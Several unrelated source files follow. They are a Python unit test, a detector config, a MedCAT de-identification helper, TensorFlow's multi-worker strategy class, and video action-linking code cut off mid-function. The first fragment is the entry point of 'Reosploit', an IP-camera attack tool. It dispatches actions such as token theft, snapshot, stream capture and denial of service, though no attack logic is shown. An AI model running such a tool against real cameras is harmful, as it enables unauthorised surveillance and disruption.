{Style.BRIGHT}{Fore.BLUE}██████╗ ███████╗ ██████╗ {Fore.RED}███████╗██████╗ ██╗ ██████╗ ██╗████████╗
{Fore.BLUE}██╔══██╗██╔════╝██╔═══██╗{Fore.RED}██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
{Fore.BLUE}██████╔╝█████╗ ██║ ██║{Fore.RED}███████╗██████╔╝██║ ██║ ██║██║ ██║
{Fore.BLUE}██╔══██╗██╔══╝ ██║ ██║{Fore.RED}╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║
{Fore.BLUE}██║ ██║███████╗╚██████╔╝{Fore.RED}███████║██║ ███████╗╚██████╔╝██║ ██║
{Fore.BLUE}╚═╝ ╚═╝╚══════╝ ╚═════╝ {Fore.RED}╚══════╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ {Fore.RESET}
-+ {yellow}Reosploit v1.2.0{Fore.RESET} +-
--==[ {Fore.RED}{str(len(actionchoices))} Actions Loaded{Fore.RESET} ]==--
--==[ {green}@SpicySoulsv{Fore.RESET} ]==--
--==[ {cyan}Beyond Root Sec{Fore.RESET} ]==--
{Style.RESET_ALL}'''
print(banner)
setargs()
if args.action == "scan":
if "/" in args.ip:
pass
else:
info("Please use an IP Range! E.g: 192.168.1.0/24")
sys.exit()
try:
ips = list(netaddr.IPNetwork(args.ip).iter_hosts())
except:
info("Please use an IP Range! E.g: 192.168.1.0/24")
sys.exit()
else:
if "/" in args.ip:
info("Please use a single IP! E.g: 192.168.1.1")
sys.exit()
try:
if args.action == 'scan':
scan()
elif args.action == 'listen':
listen()
elif args.action == 'token':
token = gettoken(args.ip)
info('Token Generated Successfully.')
print("Camera: " + args.ip)
print("Authentication: " + args.u + ":" + args.p)
print("Token: " + token)
elif args.action == 'enumerate':
enumerate()
elif args.action == 'snap':
snap()
elif args.action == 'dos':
dos()
elif args.action == 'stream':
stream()
elif args.action == 'infared':
infared()
elif args.action == 'recording':
recording()
except KeyboardInterrupt:
print("\nQuitting...")
sys.exit()
|
the-stack_106_19132
|
import unittest
from test import test_support as support
# For scope testing.
g = "Global variable"
class DictComprehensionTest(unittest.TestCase):
def test_basics(self):
expected = {0: 10, 1: 11, 2: 12, 3: 13, 4: 14, 5: 15, 6: 16, 7: 17,
8: 18, 9: 19}
actual = {k: k + 10 for k in range(10)}
self.assertEqual(actual, expected)
expected = {0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9}
actual = {k: v for k in range(10) for v in range(10) if k == v}
self.assertEqual(actual, expected)
def test_scope_isolation(self):
k = "Local Variable"
expected = {0: None, 1: None, 2: None, 3: None, 4: None, 5: None,
6: None, 7: None, 8: None, 9: None}
actual = {k: None for k in range(10)}
self.assertEqual(actual, expected)
self.assertEqual(k, "Local Variable")
expected = {9: 1, 18: 2, 19: 2, 27: 3, 28: 3, 29: 3, 36: 4, 37: 4,
38: 4, 39: 4, 45: 5, 46: 5, 47: 5, 48: 5, 49: 5, 54: 6,
55: 6, 56: 6, 57: 6, 58: 6, 59: 6, 63: 7, 64: 7, 65: 7,
66: 7, 67: 7, 68: 7, 69: 7, 72: 8, 73: 8, 74: 8, 75: 8,
76: 8, 77: 8, 78: 8, 79: 8, 81: 9, 82: 9, 83: 9, 84: 9,
85: 9, 86: 9, 87: 9, 88: 9, 89: 9}
actual = {k: v for v in range(10) for k in range(v * 9, v * 10)}
self.assertEqual(k, "Local Variable")
self.assertEqual(actual, expected)
def test_scope_isolation_from_global(self):
expected = {0: None, 1: None, 2: None, 3: None, 4: None, 5: None,
6: None, 7: None, 8: None, 9: None}
actual = {g: None for g in range(10)}
self.assertEqual(actual, expected)
self.assertEqual(g, "Global variable")
expected = {9: 1, 18: 2, 19: 2, 27: 3, 28: 3, 29: 3, 36: 4, 37: 4,
38: 4, 39: 4, 45: 5, 46: 5, 47: 5, 48: 5, 49: 5, 54: 6,
55: 6, 56: 6, 57: 6, 58: 6, 59: 6, 63: 7, 64: 7, 65: 7,
66: 7, 67: 7, 68: 7, 69: 7, 72: 8, 73: 8, 74: 8, 75: 8,
76: 8, 77: 8, 78: 8, 79: 8, 81: 9, 82: 9, 83: 9, 84: 9,
85: 9, 86: 9, 87: 9, 88: 9, 89: 9}
actual = {g: v for v in range(10) for g in range(v * 9, v * 10)}
self.assertEqual(g, "Global variable")
self.assertEqual(actual, expected)
def test_global_visibility(self):
expected = {0: 'Global variable', 1: 'Global variable',
2: 'Global variable', 3: 'Global variable',
4: 'Global variable', 5: 'Global variable',
6: 'Global variable', 7: 'Global variable',
8: 'Global variable', 9: 'Global variable'}
actual = {k: g for k in range(10)}
self.assertEqual(actual, expected)
def test_local_visibility(self):
v = "Local variable"
expected = {0: 'Local variable', 1: 'Local variable',
2: 'Local variable', 3: 'Local variable',
4: 'Local variable', 5: 'Local variable',
6: 'Local variable', 7: 'Local variable',
8: 'Local variable', 9: 'Local variable'}
actual = {k: v for k in range(10)}
self.assertEqual(actual, expected)
self.assertEqual(v, "Local variable")
def test_illegal_assignment(self):
with self.assertRaisesRegexp(SyntaxError, "can't assign"):
compile("{x: y for y, x in ((1, 2), (3, 4))} = 5", "<test>",
"exec")
with self.assertRaisesRegexp(SyntaxError, "can't assign"):
compile("{x: y for y, x in ((1, 2), (3, 4))} += 5", "<test>",
"exec")
def test_main():
support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
|
the-stack_106_19133
|
# model settings
model = dict(
type='TTFNet',
pretrained='modelzoo://resnet18',
backbone=dict(
type='ResNet',
depth=18,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_eval=False,
style='pytorch'),
neck=None,
bbox_head=dict(
type='TTFv2Head',
inplanes=(64, 128, 256, 512),
planes_b1=(128, 64),
planes_b2=(64, 32),
down_ratio_b1=8,
down_ratio_b2=4,
hm_head_channels=128,
wh_head_channels=64,
hm_head_conv_num=2,
wh_head_conv_num=1,
num_classes=81,
wh_scale_factor_b1=16.,
wh_scale_factor_b2=16.,
shortcut_cfg=(1, 2),
alpha=0.54,
beta=0.54,
max_objs=128,
hm_weight_b1=1.,
wh_weight_b1=5.,
hm_weight_b2=0.8,
wh_weight_b2=5.,
inf_branch=['b1', 'b2'],
use_simple_nms=False,
conv_cfg=None,
norm_cfg=dict(type='BN')))
cudnn_benchmark = True
# training and testing settings
train_cfg = dict(debug=False)
test_cfg = dict(score_thr=0.01, max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(512, 512), keep_ratio=False),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(512, 512),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=False),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=16,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
# optimizer
optimizer = dict(
type='SGD',
lr=0.002,
momentum=0.9,
weight_decay=0.0004,
paramwise_options=dict(bias_lr_mult=2., bias_decay_mult=0.))
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 5,
step=[9, 11])
checkpoint_config = dict(save_every_n_steps=200, max_to_keep=1, keep_every_n_epochs=9)
# yapf:disable
log_config = dict(interval=20)
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/ttfv2net_r18_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
the-stack_106_19135
|
from medcat.utils.data_utils import count_annotations
from medcat.cdb import CDB
def deid_text(cat, text, redact=False):
new_text = str(text)
entities = cat.get_entities(text)['entities']
for ent in sorted(entities.values(), key=lambda ent: ent['start'], reverse=True):
r = "*"*(ent['end']-ent['start']) if redact else cat.cdb.get_name(ent['cui'])
new_text = new_text[:ent['start']] + f'[{r}]' + new_text[ent['end']:]
return new_text
def make_or_update_cdb(json_path, cdb=None, min_count=0):
r''' Creates a new CDB or updates an existing one with new
concepts if the cdb argument is provided. All concepts that are less frequent
than min_count will be ignored.
'''
cui2cnt = count_annotations(json_path)
if cdb is None:
cdb = CDB()
for cui in cui2cnt.keys():
if cui2cnt[cui] > min_count:
# We are adding only what is needed
cdb.cui2names[cui] = set([cui])
cdb.cui2preferred_name[cui] = cui
return cdb
|
the-stack_106_19136
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Class CollectiveAllReduceStrategy implementing DistributionStrategy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.core.protobuf import tensorflow_server_pb2
from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib
from tensorflow.python.distribute import cross_device_utils
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import distribute_lib
from tensorflow.python.distribute import input_lib
from tensorflow.python.distribute import mirrored_strategy
from tensorflow.python.distribute import multi_worker_util
from tensorflow.python.distribute import numpy_dataset
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import values
from tensorflow.python.distribute.cluster_resolver import SimpleClusterResolver
from tensorflow.python.distribute.cluster_resolver import TFConfigClusterResolver
from tensorflow.python.eager import context
from tensorflow.python.eager import tape
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util.tf_export import tf_export
# TODO(yuefengz): support in-graph replication.
@tf_export("distribute.experimental.MultiWorkerMirroredStrategy", v1=[])
class CollectiveAllReduceStrategy(distribute_lib.Strategy):
"""Distribution strategy that uses collective ops for all-reduce.
It is similar to MirroredStrategy but it uses collective ops for reduction.
By default it uses all local GPUs or CPU for single-worker training.
When 'TF_CONFIG' environment variable is given, it parses cluster_spec,
task_type and task_id from 'TF_CONFIG' and turns into a multi-worker strategy
which mirrores models on GPUs of all machines in a cluster. In the current
implementation, it uses all GPUs in a cluster and it assumes all workers have
the same number of GPUs.
It supports both eager mode and graph mode. However, for eager mode, it has to
set up the eager context in its constructor and therefore all ops in eager
mode have to run after the strategy object is created.
Args:
communication: optional Enum of type
`distribute.experimental.CollectiveCommunication`. This provides a way
for the user to override the choice of collective op communication.
Possible values include `AUTO`, `RING`, and `NCCL`.
"""
def __init__(
self,
communication=cross_device_ops_lib.CollectiveCommunication.AUTO):
"""Initializes the object."""
super(CollectiveAllReduceStrategy, self).__init__(
CollectiveAllReduceExtended(
self,
communication=communication))
@tf_export(v1=["distribute.experimental.MultiWorkerMirroredStrategy"])
class CollectiveAllReduceStrategyV1(distribute_lib.StrategyV1):
__doc__ = CollectiveAllReduceStrategy.__doc__
def __init__(
self,
communication=cross_device_ops_lib.CollectiveCommunication.AUTO):
"""Initializes the object."""
super(CollectiveAllReduceStrategyV1, self).__init__(
CollectiveAllReduceExtended(
self,
communication=communication))
class CollectiveAllReduceExtended(mirrored_strategy.MirroredExtended):
"""Implementation of CollectiveAllReduceStrategy."""
def __init__(self,
container_strategy,
communication,
cluster_resolver=TFConfigClusterResolver()):
distribute_lib.StrategyExtendedV1.__init__(self, container_strategy)
assert isinstance(
communication,
cross_device_ops_lib.CollectiveCommunication)
self._communication = communication
self._initialize_strategy(cluster_resolver)
assert isinstance(self._get_cross_device_ops(),
cross_device_ops_lib.CollectiveAllReduce)
def _initialize_strategy(self, cluster_resolver):
if cluster_resolver.cluster_spec().as_dict():
self._initialize_multi_worker(cluster_resolver)
else:
self._initialize_local(cluster_resolver)
def _initialize_local(self, cluster_resolver):
"""Initializes the object for local training."""
self._is_chief = True
self._num_workers = 1
# TODO(b/126786766): TFConfigClusterResolver returns wrong number of GPUs in
# some cases.
if isinstance(cluster_resolver, TFConfigClusterResolver):
num_gpus = context.num_gpus()
else:
num_gpus = cluster_resolver.num_accelerators().get("GPU", 0)
if num_gpus:
local_devices = tuple("/device:GPU:%d" % i for i in range(num_gpus))
else:
local_devices = ("/device:CPU:0",)
self._worker_device = device_util.canonicalize("/device:CPU:0")
self._host_input_device = numpy_dataset.SingleDevice(self._worker_device)
self._collective_keys = cross_device_utils.CollectiveKeys()
super(CollectiveAllReduceExtended, self)._initialize_local(local_devices)
# TODO(yuefengz): remove num_gpus_per_worker from CollectiveAllReduce.
self._cross_device_ops = cross_device_ops_lib.CollectiveAllReduce(
num_workers=self._num_workers,
num_gpus_per_worker=num_gpus,
collective_keys=self._collective_keys)
self._cluster_spec = None
self._task_type = None
self._task_id = None
# This is a mark to tell whether we are running with standalone client or
# independent worker. Right now with standalone client, strategy object is
# created as local strategy and then turn into multi-worker strategy via
# configure call.
self._local_or_standalone_client_mode = True
# Save the num_gpus_per_worker and rpc_layer for configure method.
self._num_gpus_per_worker = num_gpus
self._rpc_layer = cluster_resolver.rpc_layer
logging.info("CollectiveAllReduceStrategy with local_devices = %r",
local_devices)
def _initialize_multi_worker(self, cluster_resolver):
"""Initializes the object for multi-worker training."""
# TODO(yuefengz): The `num_gpus` is only for this particular task. It
# assumes all workers have the same number of GPUs. We should remove this
# assumption by querying all tasks for their numbers of GPUs.
# TODO(b/126786766): TFConfigClusterResolver returns wrong number of GPUs in
# some cases.
if isinstance(cluster_resolver, TFConfigClusterResolver):
num_gpus = context.num_gpus()
else:
num_gpus = cluster_resolver.num_accelerators().get("GPU", 0)
cluster_spec = multi_worker_util.normalize_cluster_spec(
cluster_resolver.cluster_spec())
task_type = cluster_resolver.task_type
task_id = cluster_resolver.task_id
if task_type is None or task_id is None:
raise ValueError("When `cluster_spec` is given, you must also specify "
"`task_type` and `task_id`.")
self._num_workers = multi_worker_util.worker_count(cluster_spec, task_type)
if not self._num_workers:
raise ValueError("No `worker`, `chief` or `evaluator` tasks can be found "
"in `cluster_spec`.")
self._is_chief = multi_worker_util.is_chief(cluster_spec, task_type,
task_id)
self._worker_device = "/job:%s/task:%d" % (task_type, task_id)
self._host_input_device = numpy_dataset.SingleDevice(self._worker_device)
if num_gpus:
local_devices = tuple("%s/device:GPU:%d" % (self._worker_device, i)
for i in range(num_gpus))
else:
local_devices = (self._worker_device,)
self._collective_keys = cross_device_utils.CollectiveKeys()
super(CollectiveAllReduceExtended, self)._initialize_local(local_devices)
self._input_workers = input_lib.InputWorkers(
self._device_map, [(self._worker_device, self.worker_devices)])
self._cross_device_ops = cross_device_ops_lib.CollectiveAllReduce(
num_workers=self._num_workers,
num_gpus_per_worker=num_gpus,
collective_keys=self._collective_keys)
# Add a default device so that ops without specified devices will not end up
# on other workers.
self._default_device = "/job:%s/task:%d" % (task_type, task_id)
self._cluster_spec = cluster_spec
self._task_type = task_type
self._task_id = task_id
# Save the num_gpus_per_worker and rpc_layer for configure method.
self._num_gpus_per_worker = num_gpus
self._rpc_layer = cluster_resolver.rpc_layer
logging.info(
"Multi-worker CollectiveAllReduceStrategy with cluster_spec = %r, "
"task_type = %r, task_id = %r, num_workers = %r, local_devices = %r, "
"communication = %s", cluster_spec.as_dict(), task_type,
task_id, self._num_workers, local_devices,
self._communication)
if (context.executing_eagerly() and
not getattr(self, "_std_server_started", False) and
not getattr(self, "_local_or_standalone_client_mode", False)):
# Checking _local_or_standalone_client_mode as well because we should not
# create the std server in standalone client mode.
config_proto = config_pb2.ConfigProto()
config_proto = self._update_config_proto(config_proto)
server_def = tensorflow_server_pb2.ServerDef(
cluster=cluster_spec.as_cluster_def(),
default_session_config=config_proto,
job_name=task_type,
task_index=task_id,
protocol=cluster_resolver.rpc_layer or "grpc")
context.context().enable_collective_ops(server_def)
self._std_server_started = True
logging.info(
"Enabled multi-worker collective ops with available devices: %r",
context.context().devices())
def _create_variable(self, next_creator, *args, **kwargs):
colocate_with = kwargs.pop("colocate_with", None)
if colocate_with is None:
device_map = self._device_map
logical_device = 0 # TODO(josh11b): Get logical device from scope here.
elif isinstance(colocate_with, numpy_dataset.SingleDevice):
with ops.device(colocate_with.device):
return next_creator(*args, **kwargs)
else:
device_map = colocate_with.device_map
logical_device = colocate_with.logical_device
def _real_mirrored_creator(devices, *args, **kwargs):
"""Creates one MirroredVariable on the current worker."""
unique_var_name = ops.get_default_graph().unique_name(
kwargs["name"], mark_as_used=False).rstrip("/")
# pylint: disable=protected-access
collective_instance_key = self._collective_keys.get_instance_key(
key_id=unique_var_name)
# Only the first device participles in the broadcast of initial values.
group_key = self._collective_keys.get_group_key([devices[0]])
group_size = self._num_workers
if "initial_value" not in kwargs:
raise ValueError("Initial value must be specified.")
initial_value = kwargs["initial_value"]
if callable(initial_value):
initial_value_fn = initial_value
else:
initial_value_fn = lambda: initial_value
value_list = []
for i, d in enumerate(devices):
with ops.init_scope(), ops.device(d):
if i == 0:
# The initial value fn makes sure variables all initialized to
# same values. The first device of the chief worker will send their
# variable values to other workers.
def _overridden_initial_value_fn(device=d, index=i): # pylint: disable=g-missing-docstring
with ops.device(device):
initial_value = initial_value_fn()
assert not callable(initial_value)
initial_value = ops.convert_to_tensor(initial_value)
assert index == 0, index
if self._num_workers > 1:
if self._is_chief:
bcast_send = collective_ops.broadcast_send(
initial_value, initial_value.shape, initial_value.dtype,
group_size, group_key, collective_instance_key)
with ops.control_dependencies([bcast_send]):
return array_ops.identity(initial_value)
else:
return collective_ops.broadcast_recv(
initial_value.shape, initial_value.dtype, group_size,
group_key, collective_instance_key)
return initial_value
else:
# Give replicas meaningful distinct names:
var0name = value_list[0].name.split(":")[0]
# We append a / to variable names created on replicas with id > 0 to
# ensure that we ignore the name scope and instead use the given
# name as the absolute name of the variable.
kwargs["name"] = "%s/replica_%d/" % (var0name, i)
# Variables on non-first replica get initial values from the
# variables created on the first device of each worker.
def _overridden_initial_value_fn(device=d, index=i):
assert index > 0
with ops.device(device):
if context.executing_eagerly():
return array_ops.identity(value_list[0].value())
else:
return array_ops.identity(value_list[0].initial_value)
kwargs["initial_value"] = _overridden_initial_value_fn
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
# Don't record operations (e.g. other variable reads) during
# variable creation.
with tape.stop_recording():
v = next_creator(*args, **kwargs)
if i == 0:
actual_var_name = v.name.split(":")[0]
assert unique_var_name == actual_var_name, "%r vs %r" % (
unique_var_name, actual_var_name)
assert not isinstance(v, values.DistributedVariable)
value_list.append(v)
return value_list
# pylint: disable=protected-access
return mirrored_strategy._create_mirrored_variable(
self._container_strategy(), device_map, logical_device,
_real_mirrored_creator, *args, **kwargs)
def _make_input_context(self):
if self._cluster_spec is None:
input_pipeline_id = 0
else:
input_pipeline_id = multi_worker_util.id_in_cluster(
self._cluster_spec, self._task_type, self._task_id)
input_context = distribute_lib.InputContext(
num_input_pipelines=self._num_workers,
input_pipeline_id=input_pipeline_id,
num_replicas_in_sync=self._num_replicas_in_sync)
return input_context
def _experimental_distribute_dataset(self, dataset):
input_context = self._make_input_context()
return input_lib.get_distributed_dataset(dataset, self._input_workers,
self._num_replicas_in_sync,
input_context=input_context)
def _make_dataset_iterator(self, dataset):
"""Distributes the dataset to each local GPU."""
input_context = self._make_input_context()
return input_lib.DatasetIterator(dataset, self._input_workers,
self._num_replicas_in_sync,
input_context=input_context)
def _make_input_fn_iterator(
self,
input_fn,
replication_mode=distribute_lib.InputReplicationMode.PER_WORKER):
"""Distributes the input function to each local GPU."""
input_context = self._make_input_context()
return input_lib.InputFunctionIterator(
input_fn, self._input_workers, [input_context])
def _configure(self,
session_config=None,
cluster_spec=None,
task_type=None,
task_id=None):
"""Configures the object.
Args:
session_config: a `tf.compat.v1.ConfigProto`
cluster_spec: a dict, ClusterDef or ClusterSpec object specifying the
cluster configurations.
task_type: the current task type, such as "worker".
task_id: the current task id.
Raises:
ValueError: if `task_type` is not in the `cluster_spec`.
"""
if cluster_spec:
# Use the num_gpus_per_worker recorded in constructor since _configure
# doesn't take num_gpus.
cluster_resolver = SimpleClusterResolver(
cluster_spec=multi_worker_util.normalize_cluster_spec(cluster_spec),
task_type=task_type,
task_id=task_id,
num_accelerators={"GPU": self._num_gpus_per_worker},
rpc_layer=self._rpc_layer)
self._initialize_multi_worker(cluster_resolver)
assert isinstance(self._get_cross_device_ops(),
cross_device_ops_lib.CollectiveAllReduce)
if session_config:
session_config.CopyFrom(self._update_config_proto(session_config))
def _update_config_proto(self, config_proto):
updated_config = copy.deepcopy(config_proto)
# Enable the scoped allocator optimization for CollectiveOps. This
# optimization converts many small all-reduces into fewer larger
# all-reduces.
rewrite_options = updated_config.graph_options.rewrite_options
rewrite_options.scoped_allocator_optimization = (
rewriter_config_pb2.RewriterConfig.ON)
# We turn on ScopedAllocator only for CollectiveReduce op, i.e. enable_op =
# ["CollectiveReduce"]. Since we can't assign to a repeated proto field, we
# clear and then append.
del rewrite_options.scoped_allocator_opts.enable_op[:]
rewrite_options.scoped_allocator_opts.enable_op.append("CollectiveReduce")
if ((self._communication ==
cross_device_ops_lib.CollectiveCommunication.NCCL) and
self._num_gpus_per_worker > 0):
updated_config.experimental.collective_nccl = True
if not self._cluster_spec:
return updated_config
assert self._task_type
assert self._task_id is not None
# Collective group leader is needed for collective ops to coordinate
# workers.
updated_config.experimental.collective_group_leader = (
multi_worker_util.collective_leader(self._cluster_spec, self._task_type,
self._task_id))
# The device filters prevent communication between workers.
del updated_config.device_filters[:]
updated_config.device_filters.append(
"/job:%s/task:%d" % (self._task_type, self._task_id))
return updated_config
def _reduce_to(self, reduce_op, value, destinations):
if (isinstance(value, values.Mirrored) and
reduce_op == reduce_util.ReduceOp.MEAN):
return value
assert not isinstance(value, values.Mirrored)
if (isinstance(value, values.DistributedValues) and
len(self.worker_devices) == 1):
value = value.values[0]
# When there are multiple workers, we need to reduce across workers using
# collective ops.
if (not isinstance(value, values.DistributedValues) and
self._num_workers == 1):
# This function handles reducing values that are not PerReplica or
# Mirrored values. For example, the same value could be present on all
# replicas in which case `value` would be a single value or value could
# be 0.
return cross_device_ops_lib.reduce_non_distributed_value(
reduce_op, self._device_map, value, destinations)
return self._get_cross_device_ops().reduce(
reduce_op, value, destinations=destinations)
@property
def experimental_between_graph(self):
return True
@property
def experimental_should_init(self):
return True
@property
def should_checkpoint(self):
return self._is_chief
@property
def should_save_summary(self):
return self._is_chief
@property
def _num_replicas_in_sync(self):
return len(self.worker_devices) * self._num_workers
# TODO(priyag): Delete this once all strategies use global batch size.
@property
def _global_batch_size(self):
"""`make_dataset_iterator` and `make_numpy_iterator` use global batch size.
`make_input_fn_iterator` assumes per-replica batching.
Returns:
Boolean.
"""
return True
|
the-stack_106_19137
|
# -*- coding:utf-8 -*-
import numpy as np
import os
from core.utils import *
def compute_score_one_class(bbox1, bbox2, w_iou=1.0, w_scores=1.0, w_scores_mul=0.5):
# bbx: <x1> <y1> <x2> <y2> <class score>
n_bbox1 = bbox1.shape[0]
n_bbox2 = bbox2.shape[0]
# for saving all possible scores between each two bbxes in successive frames
scores = np.zeros([n_bbox1, n_bbox2], dtype=np.float32)
for i in range(n_bbox1):
box1 = bbox1[i, :4]
for j in range(n_bbox2):
box2 = bbox2[j, :4]
bbox_iou_frames = bbox_iou(box1, box2, x1y1x2y2=True)
sum_score_frames = bbox1[i, 4] + bbox2[j, 4]
mul_score_frames = bbox1[i, 4] * bbox2[j, 4]
scores[i, j] = w_iou * bbox_iou_frames + w_scores * sum_score_frames + w_scores_mul * mul_score_frames
return scores
def link_bbxes_between_frames(bbox_list, w_iou=1.0, w_scores=1.0, w_scores_mul=0.5):
# bbx_list: list of bounding boxes <x1> <y1> <x2> <y2> <class score>
# check no empty detections
ind_notempty = []
nfr = len(bbox_list)
for i in range(nfr):
if np.array(bbox_list[i]).size:
ind_notempty.append(i)
# no detections at all
if not ind_notempty:
return []
# miss some frames
elif len(ind_notempty)!=nfr:
for i in range(nfr):
if not np.array(bbox_list[i]).size:
# copy the nearest detections to fill in the missing frames
ind_dis = np.abs(np.array(ind_notempty) - i)
nn = np.argmin(ind_dis)
bbox_list[i] = bbox_list[ind_notempty[nn]]
detect = bbox_list
nframes = len(detect)
res = []
isempty_vertex = np.zeros([nframes,], dtype=np.bool)
edge_scores = [compute_score_one_class(detect[i], detect[i+1], w_iou=w_iou, w_scores=w_scores, w_scores_mul=w_scores_mul) for i in range(nframes-1)]
copy_edge_scores = edge_scores
while not np.any(isempty_vertex):
# initialize
scores = [np.zeros([d.shape[0],], dtype=np.float32) for d in detect]
index = [np.nan*np.ones([d.shape[0],], dtype=np.float32) for d in detect]
# viterbi
# from the second last frame back
for i in range(nframes-2, -1, -1):
edge_score = edge_scores[i] + scores[i+1]
# find the maximum score for each bbox in the i-th frame and the corresponding index
scores[i] = np.max(edge_score, axis=1)
index[i] = np.argmax(edge_score, axis=1)
# decode
idx = -np.ones([nframes], dtype=np.int32)
idx[0] = np.argmax(scores[0])
for i in range(0, nframes-1):
idx[i+1] = index[i][idx[i]]
# remove covered boxes and build output structures
this = np.empty((nframes, 6), dtype=np.float32)
this[:, 0] = 1 + np.arange(nframes)
for i in range(nframes):
j = idx[i]
iouscore = 0
if i < nframes-1:
iouscore = copy_edge_scores[i][j, idx[i+1]] - bbox_list[i][j, 4] - bbox_list[i+1][idx[i+1], 4]
if i < nframes-1: edge_scores[i] = np.delete(edge_scores[i], j, 0)
if i > 0: edge_scores[i-1] = np.delete(edge_scores[i-1], j, 1)
this[i, 1:5] = detect[i][j, :4]
this[i, 5] = detect[i][j, 4]
detect[i] = np.delete(detect[i], j, 0)
isempty_vertex[i] = (detect[i].size==0) # it is true when there is no detection in any frame
res.append( this )
if len(res) == 3:
break
return res
def link_video_one_class(vid_det, bNMS3d = False, gtlen=None):
'''
linking for one class in a video (in full length)
vid_det: a list of [frame_index, [bbox cls_score]]
gtlen: the mean length of gt in training set
return a list of tube [array[frame_index, x1,y1,x2,y2, cls_score]]
'''
# list of bbox information [[bbox in frame 1], [bbox in frame 2], ...]
vdets = [vid_det[i][1] for i in range(len(vid_det))]
vres = link_bbxes_between_frames(vdets)
if len(vres) != 0:
if bNMS3d:
tube = [b[:, :5] for b in vres]
# compute score for each tube
tube_scores = [np.mean(b[:, 5]) for b in vres]
dets = [(tube[t], tube_scores[t]) for t in range(len(tube))]
# nms for tubes
keep = nms_3d(dets, 0.3) # bug for nms3dt
if np.array(keep).size:
vres_keep = [vres[k] for k in keep]
# max subarray with penalization -|Lc-L|/Lc
if gtlen:
vres = temporal_check(vres_keep, gtlen)
else:
vres = vres_keep
return vres
def video_ap_one_class(gt, pred_videos, iou_thresh = 0.2, bTemporal = False, gtlen = None):
'''
gt: [ video_index, array[frame_index, x1,y1,x2,y2] ]
pred_videos: [ video_index, [ [frame_index, [[x1,y1,x2,y2, score]] ] ] ]
'''
# link for prediction
pred = []
for pred_v in pred_videos:
video_index = pred_v[0]
pred_link_v = link_video_one_class(pred_v[1], True, gtlen) # [array<frame_index, x1,y1,x2,y2, cls_score>]
for tube in pred_link_v:
pred.append((video_index, tube))
# sort tubes according to scores (descending order)
argsort_scores = np.argsort(-np.array([np.mean(b[:, 5]) for _, b in pred]))
pr = np.empty((len(pred)+1, 2), dtype=np.float32) # precision, recall
pr[0,0] = 1.0
pr[0,1] = 0.0
fn = len(gt) #sum([len(a[1]) for a in gt])
fp = 0
tp = 0
gt_v_index = [g[0] for g in gt]
for i, k in enumerate(argsort_scores):
# if i % 100 == 0:
# print ("%6.2f%% boxes processed, %d positives found, %d remain" %(100*float(i)/argsort_scores.size, tp, fn))
video_index, boxes = pred[k]
ispositive = False
if video_index in gt_v_index:
gt_this_index, gt_this = [], []
for j, g in enumerate(gt):
if g[0] == video_index:
gt_this.append(g[1])
gt_this_index.append(j)
if len(gt_this) > 0:
if bTemporal:
iou = np.array([iou3dt(np.array(g), boxes[:, :5]) for g in gt_this])
else:
if boxes.shape[0] > gt_this[0].shape[0]:
# in case some frame don't have gt
iou = np.array([iou3d(g, boxes[int(g[0,0]-1):int(g[-1,0]),:5]) for g in gt_this])
elif boxes.shape[0]<gt_this[0].shape[0]:
# in flow case
iou = np.array([iou3d(g[int(boxes[0,0]-1):int(boxes[-1,0]),:], boxes[:,:5]) for g in gt_this])
else:
iou = np.array([iou3d(g, boxes[:,:5]) for g in gt_this])
if iou.size > 0: # on ucf101 if invalid annotation ....
argmax = np.argmax(iou)
if iou[argmax] >= iou_thresh:
ispositive = True
